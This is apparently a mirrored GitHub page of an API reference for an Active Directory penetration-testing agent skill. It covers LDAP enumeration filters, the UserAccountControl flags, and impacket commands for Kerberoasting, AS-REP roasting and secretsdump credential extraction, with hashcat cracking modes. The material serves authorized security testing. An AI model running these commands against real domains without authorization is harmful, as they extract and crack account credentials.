mirror of https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git synced 2026-06-12 06:04:56 +03:00

Files

T

mukul975 c21af3347e Complete folder anatomy for all 649 cybersecurity skills + update LICENSE to Mahipal

- Add scripts/agent.py and references/api-reference.md to all remaining skills
- Update all 648 LICENSE files: copyright now reads 'Mahipal'
- Add implementing-security-monitoring-with-datadog (new skill with full anatomy)
- All 649 skills now have: SKILL.md, LICENSE, scripts/agent.py, references/api-reference.md

2026-03-11 00:22:12 +01:00

2.3 KiB

Raw Blame History

Active Directory Penetration Test - API Reference

ldap3 Library

Connection

from ldap3 import Server, Connection, ALL, SUBTREE
server = Server("ldaps://dc.example.com", get_info=ALL, use_ssl=True)
conn = Connection(server, user="DOMAIN\\user", password="pass", auto_bind=True)

Key LDAP Queries

Purpose	Filter
All users	`(&(objectClass=user)(objectCategory=person))`
Users with SPNs	`(&(objectClass=user)(servicePrincipalName=*))`
AS-REP Roastable	`(&(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=4194304))`
Domain admins	`(&(objectClass=group)(cn=Domain Admins))`
Password policy	`(objectClass=domain)`

UserAccountControl Flags

Flag	Hex	Test
ACCOUNTDISABLE	0x0002	Account disabled
PASSWD_NOTREQD	0x0020	No password required
DONT_EXPIRE_PASSWORD	0x10000	Password never expires
DONT_REQ_PREAUTH	0x400000	No Kerberos pre-auth

Impacket Tools

GetUserSPNs (Kerberoasting)

python3 -m impacket.examples.GetUserSPNs DOMAIN/user:pass -dc-ip 10.0.0.1 -request

GetNPUsers (AS-REP Roasting)

python3 -m impacket.examples.GetNPUsers DOMAIN/ -usersfile users.txt -dc-ip 10.0.0.1

secretsdump (Credential Extraction)

python3 -m impacket.examples.secretsdump DOMAIN/admin:pass@10.0.0.1

Attack Techniques

Kerberoasting

Enumerate users with SPNs via LDAP
Request TGS tickets for those SPNs
Extract ticket hashes
Crack offline with hashcat (mode 13100)

AS-REP Roasting

Find accounts with pre-auth disabled
Request AS-REP without authentication
Extract encrypted part of AS-REP
Crack offline with hashcat (mode 18200)

Password Policy Weaknesses

Min length < 12 characters
No account lockout threshold
No password history enforcement
Password never expires on service accounts

Output Schema

{
  "report": "ad_penetration_test",
  "domain_info": {"default_naming_context": "DC=example,DC=com"},
  "total_users": 500,
  "total_findings": 12,
  "severity_summary": {"critical": 1, "high": 8, "medium": 3}
}

CLI Usage

python agent.py --server ldaps://dc.example.com --username "DOMAIN\\user" --password "pass" --output report.json

2.3 KiB Raw Blame History

Active Directory Penetration Test - API Reference

ldap3 Library

Connection

Key LDAP Queries

UserAccountControl Flags

Impacket Tools

GetUserSPNs (Kerberoasting)

GetNPUsers (AS-REP Roasting)

secretsdump (Credential Extraction)

Attack Techniques

Kerberoasting

AS-REP Roasting

Password Policy Weaknesses

Output Schema

CLI Usage

2.3 KiB

Raw Blame History